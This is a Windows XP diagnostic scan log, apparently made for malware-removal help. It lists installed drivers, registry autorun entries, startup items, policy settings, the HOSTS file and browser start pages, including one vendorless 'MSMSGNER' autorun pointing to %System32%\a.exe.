(AliIde) AliIde [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ALIIDE.SYS -> Acer Laboratories Inc. [Ver = 1.20 | Size = 5248 bytes | Modified Date = 8/17/2001 2:51:56 PM | Attr = ]
(amdagp) AMD AGP Bus Filter Driver [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\amdagp.sys -> Advanced Micro Devices, Inc. [Ver = 5.00 (xpsp_sp2_rtm.040803-2158) | Size = 43008 bytes | Modified Date = 8/4/2004 1:07:42 AM | Attr = ]
(asc) asc [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ASC.SYS -> Advanced System Products, Inc. [Ver = 2.9I-MS (XPClient.010817-1148) | Size = 26496 bytes | Modified Date = 8/17/2001 2:52:00 PM | Attr = ]
(asc3550) asc3550 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ASC3550.SYS -> Advanced System Products, Inc. [Ver = 3.1E-MS (XPClient.010817-1148) | Size = 14848 bytes | Modified Date = 8/17/2001 2:51:58 PM | Attr = ]
(atapi) Standard IDE/ESDI Hard Disk Controller [Kernel | Boot | Running] -> %System32%\DRIVERS\atapi.sys -> [Ver = | Size = 87296 bytes | Modified Date = 4/23/2003 10:29:54 AM | Attr = ]
(Atdisk) Atdisk [Kernel | Disabled | Stopped] -> -> File not found
(bvrp_pci) bvrp_pci [Kernel | On_Demand | Stopped] -> -> File not found
(Changer) Changer [Kernel | System | Stopped] -> -> File not found
(CmdIde) CmdIde [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\CMDIDE.SYS -> CMD Technology, Inc. [Ver = 2.0.7 (XPClient.010817-1148) | Size = 6656 bytes | Modified Date = 8/17/2001 2:51:54 PM | Attr = ]
(dac2w2k) dac2w2k [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\DAC2W2K.SYS -> Mylex Corporation [Ver = 6.00-21 (XPClient.010817-1148) | Size = 179584 bytes | Modified Date = 8/17/2001 2:52:16 PM | Attr = ]
(dmboot) dmboot [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\dmboot.sys -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 799744 bytes | Modified Date = 8/4/2004 1:07:18 AM | Attr = ]
(dmio) dmio [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\dmio.sys -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 153344 bytes | Modified Date = 8/4/2004 1:07:16 AM | Attr = ]
(dmload) dmload [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\DMLOAD.SYS -> Microsoft Corp., Veritas Software. [Ver = 2600.0.503.0 | Size = 5888 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(drvmcdb) drvmcdb [Kernel | Boot | Running] -> %System32%\DRIVERS\drvmcdb.sys -> Sonic Solutions [Ver = 3.21.65a | Size = 84576 bytes | Modified Date = 7/31/2003 4:21:00 AM | Attr = ]
(drvnddm) drvnddm [File_System | Auto | Running] -> %System32%\DRIVERS\drvnddm.sys -> Sonic Solutions [Ver = 2.56.38a | Size = 40448 bytes | Modified Date = 6/20/2003 3:56:00 AM | Attr = ]
(E100B) Intel® PRO Adapter Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\e100b325.sys -> Intel Corporation [Ver = 7.0.26.0 built by: WinDDK | Size = 145408 bytes | Modified Date = 3/4/2003 1:56:26 PM | Attr = ]
(EL90XBC) 3Com EtherLink XL 90XB/C Adapter Driver [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\EL90XBC5.SYS -> 3Com Corporation [Ver = 4.05.00.0000 | Size = 66591 bytes | Modified Date = 8/17/2001 1:11:06 PM | Attr = ]
(ENTECH) ENTECH [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\Entech.sys -> EnTech Taiwan [Ver = 1.0 | Size = 20400 bytes | Modified Date = 10/21/1999 12:12:52 PM | Attr = ]
(GEARAspiWDM) GEARAspiWDM [Kernel | On_Demand | Running] -> %System32%\DRIVERS\GEARAspiWDM.sys -> GEAR Software Inc. [Ver = 2.0.6.1 | Size = 15664 bytes | Modified Date = 9/19/2006 4:44:04 PM | Attr = ]
(GTNDIS5) GTNDIS5 NDIS Protocol Driver [Kernel | On_Demand | Running] -> %System32%\GTNDIS5.sys -> Printing Communications Assoc., Inc. (PCAUSA) [Ver = 5.03.16.54 | Size = 15872 bytes | Modified Date = 9/25/2003 10:15:32 PM | Attr = ]
(HPZid412) IEEE-1284.4 Driver HPZid412 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\hpzid412.sys -> HP [Ver = 6, 0, 0, 0 | Size = 51024 bytes | Modified Date = 3/9/2003 3:31:00 PM | Attr = ]
(HPZipr12) Print Class Driver for IEEE-1284.4 HPZipr12 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\HPZipr12.sys -> HP [Ver = 6, 0, 0, 0 | Size = 16080 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(HPZius12) USB to IEEE-1284.4 Translation Driver HPZius12 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\HPZius12.sys -> HP [Ver = 6, 0, 0, 0 | Size = 21456 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(i81x) i81x [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\i81xnt5.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 161020 bytes | Modified Date = 8/4/2004 12:29:36 AM | Attr = ]
(iAimFP0) iAimFP0 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv01nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12415 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP1) iAimFP1 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv02nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12127 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP2) iAimFP2 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv05nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 11775 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP3) iAimFP3 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wsiintxx.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12063 bytes | Modified Date = 8/4/2004 12:29:48 AM | Attr = ]
(iAimFP4) iAimFP4 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wvchntxx.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 19455 bytes | Modified Date = 8/4/2004 12:29:50 AM | Attr = ]
(iAimTV0) iAimTV0 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv01nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 29311 bytes | Modified Date = 8/4/2004 12:29:42 AM | Attr = ]
(iAimTV1) iAimTV1 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv02nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 19551 bytes | Modified Date = 8/4/2004 12:29:42 AM | Attr = ]
(iAimTV2) iAimTV2 [Kernel | On_Demand | Stopped] -> System32\DRIVERS\wATV03nt.sys -> File not found
(iAimTV3) iAimTV3 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv04nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 33599 bytes | Modified Date = 8/4/2004 12:29:44 AM | Attr = ]
(iAimTV4) iAimTV4 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wch7xxnt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 23615 bytes | Modified Date = 8/4/2004 12:29:46 AM | Attr = ]
(IntelC51) IntelC51 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC51.sys -> Intel Corporation [Ver = 2.15.25.0 | Size = 1232741 bytes | Modified Date = 11/20/2003 11:13:40 PM | Attr = ]
(IntelC52) IntelC52 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC52.sys -> Intel Corporation [Ver = 4.58.1 | Size = 646825 bytes | Modified Date = 11/20/2003 11:14:28 PM | Attr = ]
(IntelC53) IntelC53 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC53.sys -> Intel Corporation [Ver = 2.15.25.0 | Size = 59717 bytes | Modified Date = 11/20/2003 11:12:56 PM | Attr = ]
(lbrtfdc) lbrtfdc [Kernel | System | Stopped] -> -> File not found
(LVUSBSta) Logitech USB Monitor Filter [Kernel | On_Demand | Running] -> %System32%\DRIVERS\LVUSBSta.sys -> Logitech Inc. [Ver = 8.4.6.1016 | Size = 22016 bytes | Modified Date = 1/31/2005 10:12:48 AM | Attr = ]
(mohfilt) mohfilt [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\mohfilt.sys -> Intel Corporation [Ver = 7.11.0.0 | Size = 37048 bytes | Modified Date = 11/20/2003 11:12:42 PM | Attr = ]
(mraid35x) mraid35x [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\MRAID35X.SYS -> American Megatrends Inc. [Ver = 6.19 (XPClient.010817-1148) | Size = 17280 bytes | Modified Date = 8/17/2001 2:52:12 PM | Attr = ]
(MxlW2k) MxlW2k [Kernel | On_Demand | Running] -> %System32%\drivers\MxlW2k.sys -> MusicMatch, Inc. [Ver = 1.1.0.116 | Size = 28256 bytes | Modified Date = 12/18/2004 6:56:24 PM | Attr = ]
(nv) nv [Kernel | On_Demand | Running] -> %System32%\DRIVERS\nv4_mini.sys -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 3530432 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
(omci) OMCI WDM Device Driver [Kernel | System | Running] -> %System32%\DRIVERS\omci.sys -> Dell Computer Corporation [Ver = 7, 0, 323, 0 | Size = 17217 bytes | Modified Date = 11/8/2002 2:45:06 PM | Attr = ]
(P16X) Creative SB Live! Series (WDM) [Kernel | On_Demand | Running] -> %System32%\DRIVERS\P16X.sys -> Creative Technology Ltd. [Ver = 5.12.01.129 | Size = 1296384 bytes | Modified Date = 8/14/2003 11:58:12 AM | Attr = ]
(PCIDump) PCIDump [Kernel | System | Stopped] -> -> File not found
(PDCOMP) PDCOMP [Kernel | On_Demand | Stopped] -> -> File not found
(PDFRAME) PDFRAME [Kernel | On_Demand | Stopped] -> -> File not found
(PDRELI) PDRELI [Kernel | On_Demand | Stopped] -> -> File not found
(PDRFRAME) PDRFRAME [Kernel | On_Demand | Stopped] -> -> File not found
(pfc) Padus ASPI Shell [Kernel | On_Demand | Running] -> %System32%\DRIVERS\pfc.sys -> Padus, Inc. [Ver = 2, 5, 0, 200 | Size = 14604 bytes | Modified Date = 8/11/2003 10:07:46 AM | Attr = ]
(PfModNT) PfModNT [Kernel | Auto | Running] -> %System32%\PFMODNT.SYS -> Creative Technology Ltd. [Ver = 2.0.0.0 | Size = 6752 bytes | Modified Date = 12/17/1999 2:00:00 AM | Attr = ]
(PQNTDrv) PQNTDrv [Kernel | System | Running] -> %System32%\drivers\PQNTDRV.sys -> PowerQuest Corporation [Ver = 8.00.000 | Size = 4228 bytes | Modified Date = 4/16/2003 2:21:30 PM | Attr = ]
(PRISM_A02) 802.11a/g USB Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\WUSB20XP.sys -> Cisco-Linksys, LLC. [Ver = 1.0.8 | Size = 339488 bytes | Modified Date = 1/7/2004 5:04:00 PM | Attr = ]
(Ptilink) Direct Parallel Link Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\PTILINK.SYS -> Parallel Technologies, Inc. [Ver = 1.10 (XPClient.010817-1148) | Size = 17792 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(PxHelp20) PxHelp20 [Kernel | Boot | Running] -> %System32%\DRIVERS\pxhelp20.sys -> Sonic Solutions [Ver = 2.02.57a | Size = 17168 bytes | Modified Date = 7/30/2003 3:02:00 AM | Attr = ]
(QCMerced) Logitech QuickCam Communicate [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\lvcm.sys -> [Ver = | Size = 585824 bytes | Modified Date = 10/8/2004 10:58:34 AM | Attr = ]
(ql1080) ql1080 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL1080.SYS -> QLogic Corporation [Ver = 3.04 | Size = 40320 bytes | Modified Date = 8/17/2001 2:52:20 PM | Attr = ]
(ql12160) ql12160 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL12160.SYS -> QLogic Corporation [Ver = 7.13.02 (W64) | Size = 45312 bytes | Modified Date = 8/17/2001 2:52:20 PM | Attr = ]
(ql1280) ql1280 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL1280.SYS -> QLogic Corporation [Ver = 7.13.01 (W2K) | Size = 49024 bytes | Modified Date = 8/17/2001 2:52:18 PM | Attr = ]
(Secdrv) Secdrv [Kernel | Auto | Running] -> %System32%\DRIVERS\secdrv.sys -> [Ver = | Size = 27440 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(Simbad) Simbad [Kernel | Disabled | Stopped] -> -> File not found
(sisagp) SIS AGP Bus Filter [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\sisagp.sys -> Silicon Integrated Systems Corporation [Ver = 5.12.01.2010 (xpsp_sp2_rtm.040803-2158) | Size = 41088 bytes | Modified Date = 8/4/2004 1:07:42 AM | Attr = ]
(SoP1kUSB) Sony PEG Virtual Port [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\SoP1kUSB.sys -> Sony Corporation [Ver = 1.00.0006070 | Size = 29440 bytes | Modified Date = 10/9/2001 4:39:32 PM | Attr = ]
(Sparrow) Sparrow [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SPARROW.SYS -> Adaptec, Inc. [Ver = v2.0a (ReleaseBinaries.001205-1804) | Size = 19072 bytes | Modified Date = 8/17/2001 3:07:44 PM | Attr = ]
(sscdbhk5) sscdbhk5 [File_System | System | Running] -> %System32%\DRIVERS\sscdbhk5.sys -> Sonic Solutions [Ver = 1.10.81a | Size = 5621 bytes | Modified Date = 7/14/2003 12:28:40 PM | Attr = ]
(ssrtln) ssrtln [File_System | System | Running] -> %System32%\DRIVERS\ssrtln.sys -> Sonic Solutions [Ver = 1.10.81a | Size = 23219 bytes | Modified Date = 7/14/2003 12:28:22 PM | Attr = ]
(symc810) symc810 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYMC810.SYS -> Symbios Logic Inc. [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 16256 bytes | Modified Date = 8/17/2001 3:07:34 PM | Attr = ]
(symc8xx) symc8xx [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYMC8XX.SYS -> LSI Logic [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 32640 bytes | Modified Date = 8/17/2001 3:07:36 PM | Attr = ]
(sym_hi) sym_hi [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYM_HI.SYS -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 28384 bytes | Modified Date = 8/17/2001 3:07:40 PM | Attr = ]
(sym_u3) sym_u3 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYM_U3.SYS -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 30688 bytes | Modified Date = 8/17/2001 3:07:42 PM | Attr = ]
(tfsnboio) tfsnboio [File_System | Auto | Running] -> %System32%\dla\tfsnboio.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 25685 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsncofs) tfsncofs [File_System | Auto | Running] -> %System32%\dla\tfsncofs.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 34837 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsndrct) tfsndrct [File_System | Auto | Running] -> %System32%\dla\tfsndrct.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 4117 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsndres) tfsndres [File_System | Auto | Running] -> %System32%\dla\tfsndres.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 2233 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnifs) tfsnifs [File_System | Auto | Running] -> %System32%\dla\tfsnifs.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 83284 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnopio) tfsnopio [File_System | Auto | Running] -> %System32%\dla\tfsnopio.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 14229 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnpool) tfsnpool [File_System | Auto | Running] -> %System32%\dla\tfsnpool.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 6357 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnudf) tfsnudf [File_System | Auto | Running] -> %System32%\dla\tfsnudf.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 98068 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnudfa) tfsnudfa [File_System | Auto | Running] -> %System32%\dla\tfsnudfa.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 100373 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(ultra) ultra [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ULTRA.SYS -> Promise Technology, Inc. [Ver = 1.43 (Build 0603) | Size = 36736 bytes | Modified Date = 8/17/2001 2:52:22 PM | Attr = ]
(VET-FILT) VET File System Filter [Kernel | System | Running] -> %System32%\drivers\Vet-Filt.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 21031 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VET-REC) VET File System Recognizer [Kernel | System | Running] -> %System32%\drivers\Vet-Rec.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 15478 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VETEBOOT) VET Boot Scan Engine [Kernel | On_Demand | Running] -> %System32%\drivers\VetEBoot.sys -> Computer Associates International, Inc. [Ver = 30.7.0.0 | Size = 108656 bytes | Modified Date = 5/4/2007 8:56:10 AM | Attr = ]
(VETEFILE) VET File Scan Engine [Kernel | System | Running] -> %System32%\drivers\VetEFile.sys -> Computer Associates International, Inc. [Ver = 30.7.0.0 | Size = 630464 bytes | Modified Date = 5/4/2007 8:56:10 AM | Attr = ]
(VETFDDNT) VET Floppy Boot Sector Monitor [Kernel | System | Running] -> %System32%\drivers\VetFDDNT.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 15735 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VETMONNT) VET File Monitor [Kernel | System | Running] -> %System32%\drivers\vetmonnt.sys -> Computer Associates International, Inc. [Ver = 7.2.0.0 | Size = 26787 bytes | Modified Date = 7/31/2006 12:56:06 PM | Attr = ]
(W8100PCI) D-Link AirPlus G Wireless Driver [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\MRV8K51.sys -> Marvell Semiconductor, Inc [Ver = 2.03.00.000 built by: WinDDK | Size = 297984 bytes | Modified Date = 1/8/2004 10:46:18 PM | Attr = R ]
(wanatw) WAN Miniport (ATW) [Kernel | On_Demand | Stopped] -> System32\DRIVERS\wanatw4.sys -> File not found
(WDICA) WDICA [Kernel | On_Demand | Stopped] -> -> File not found

[Registry - Non-Microsoft Only]
< Run [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
CaAvTray -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 230512 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
CAVRID -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRid.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 185456 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
diagent -> %ProgramFiles%\Creative\SBLive\Diagnostics\diagent.exe -> Creative Technology Ltd [Ver = 1, 1, 4, 0 | Size = 135264 bytes | Modified Date = 4/3/2002 2:01:00 AM | Attr = ]
DwlClient -> %CommonProgramFiles%\Dell\EUSW\Support.exe -> Dell [Ver = 2, 1, 1, 0 | Size = 323584 bytes | Modified Date = 5/27/2004 9:05:42 PM | Attr = ]
iTunesHelper -> %ProgramFiles%\iTunes\iTunesHelper.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 256576 bytes | Modified Date = 10/30/2006 10:36:36 AM | Attr = ]
LogitechVideoRepair -> %ProgramFiles%\Logitech\Video\ISStart.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 458752 bytes | Modified Date = 1/18/2005 5:47:30 PM | Attr = ]
LogitechVideoTray -> %ProgramFiles%\Logitech\Video\LogiTray.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 217088 bytes | Modified Date = 1/18/2005 5:37:30 PM | Attr = ]
MSMSGNER -> %System32%\a.exe -> [Ver = | Size = 521728 bytes | Modified Date = 6/10/2007 2:04:02 AM | Attr = ]
NeroFilterCheck -> %System32%\NeroCheck.exe -> Ahead Software Gmbh [Ver = 1, 0, 0, 2 | Size = 155648 bytes | Modified Date = 7/9/2001 10:50:42 AM | Attr = ]
NvCplDaemon -> %System32%\nvcpl.dll [RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup] -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 7286784 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
NvMediaCenter -> %System32%\nvmctray.dll [RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit] -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 86016 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
QuickTime Task -> %ProgramFiles%\QuickTime\qttask.exe -> Apple Computer, Inc. [Ver = 7.1.3 | Size = 282624 bytes | Modified Date = 10/25/2006 7:58:18 PM | Attr = ]
SunJavaUpdateSched -> %ProgramFiles%\Java\j2re1.4.2_04\bin\jusched.exe -> [Ver = | Size = 32881 bytes | Modified Date = 2/22/2004 11:44:44 PM | Attr = ]
TkBellExe -> %CommonProgramFiles%\Real\Update_OB\realsched.exe -> RealNetworks, Inc. [Ver = 0.1.0.1622 | Size = 151597 bytes | Modified Date = 3/26/2004 4:10:10 PM | Attr = ]
< OptionalComponents [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\
IMAIL -> Installed = 1 ->
MAPI -> Installed = 1 ->
MSFS -> Installed = 1 ->
< Run [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
LogitechSoftwareUpdate -> %ProgramFiles%\Logitech\Video\ManifestEngine.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 196608 bytes | Modified Date = 1/18/2005 5:07:54 PM | Attr = ]
MoneyAgent -> %ProgramFiles%\Microsoft Money\System\mnyexpr.exe -> File not found
< Common Startup > -> C:\Documents and Settings\All Users\Start Menu\Programs\Startup
%AllUsersStartup%\Adobe Gamma Loader.lnk -> %CommonProgramFiles%\Adobe\Calibration\Adobe Gamma Loader.exe -> Adobe Systems, Inc. [Ver = 1, 0, 0, 1 | Size = 113664 bytes | Modified Date = 11/4/1999 3:06:48 PM | Attr = ]
%AllUsersStartup%\Adobe Reader Speed Launch.lnk -> %ProgramFiles%\Adobe\Acrobat 7.0\Reader\reader_sl.exe -> Adobe Systems Incorporated [Ver = 7.0.5.2005092300 | Size = 29696 bytes | Modified Date = 9/23/2005 10:05:26 PM | Attr = ]
%AllUsersStartup%\D-Link AirPlus G Configuration Utility.lnk -> %ProgramFiles%\D-Link AirPlus G\AIRPLUS.exe -> D-Link [Ver = 1, 0, 0, 0 | Size = 294912 bytes | Modified Date = 1/6/2004 9:19:38 PM | Attr = ]
%AllUsersStartup%\HotSync Manager.lnk -> %ProgramFiles%\Sony Handheld\HOTSYNC.EXE -> Palm, Inc. [Ver = 4.0.1 | Size = 299008 bytes | Modified Date = 5/31/2001 9:52:46 AM | Attr = ]
%AllUsersStartup%\hp psc 2000 Series.lnk -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 323646 bytes | Modified Date = 4/9/2003 6:41:38 PM | Attr = ]
%AllUsersStartup%\hpoddt01.exe.lnk -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe -> Hewlett-Packard [Ver = 1, 0, 0, 1 | Size = 28672 bytes | Modified Date = 4/9/2003 7:11:12 PM | Attr = ]
%AllUsersStartup%\Sony PDA USB Switcher.lnk -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
%AllUsersStartup%\SonyPDA USB Switcher.lnk -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
< User Startup > -> C:\Documents and Settings\Admin\Start Menu\Programs\Startup
-> %UserStartup%\PowerReg Scheduler V3.exe -> Leader Technologies [Ver = 3,0,0,0 | Size = 225280 bytes | Modified Date = 5/27/2004 11:02:24 PM | Attr = ]
< SecurityProviders [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\\SecurityProviders
< Winlogon settings [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
< Winlogon settings [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
< CurrentVersion Policy Settings [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> _
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoCDBurning -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} -> 1073741857 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{0DF44EAA-FF21-4412-828E-260A8728E7F1} -> 32 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\dontdisplaylastusername -> 0 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticecaption -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticetext -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\shutdownwithoutlogon -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\undockwithoutlogon -> 1 ->
< CurrentVersion Policy Settings [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> 145 ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\WinOldApp\ -> ->
< HOSTS File > (734 bytes) -> C:\WINDOWS\System32\drivers\etc\Hosts
127.0.0.1 localhost -> ->
< Internet Explorer Settings > ->
HKLM: Default_Page_URL -> http://www.dell4me.com/myway ->
HKLM: Main\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKLM: Local Page -> %SystemRoot%\system32\blank.htm ->
HKLM: Search Page -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKLM: Start Page -> http://www.dell4me.com/myway ->
HKLM: CustomizeSearch -> http://ie.search.msn.com/en-us/srchasst/srchcust.htm ->
HKLM: SearchAssistant -> http://ie.search.msn.com/en-us/srchasst/srchasst.htm ->
HKCU: Default_Page_URL -> http://www.dell4me.com/myway ->
HKCU: Local Page -> C:\WINDOWS\system32\blank.htm ->
HKCU: Search Bar -> http://g.msn.com/0SEENUS/SAOS01 ->
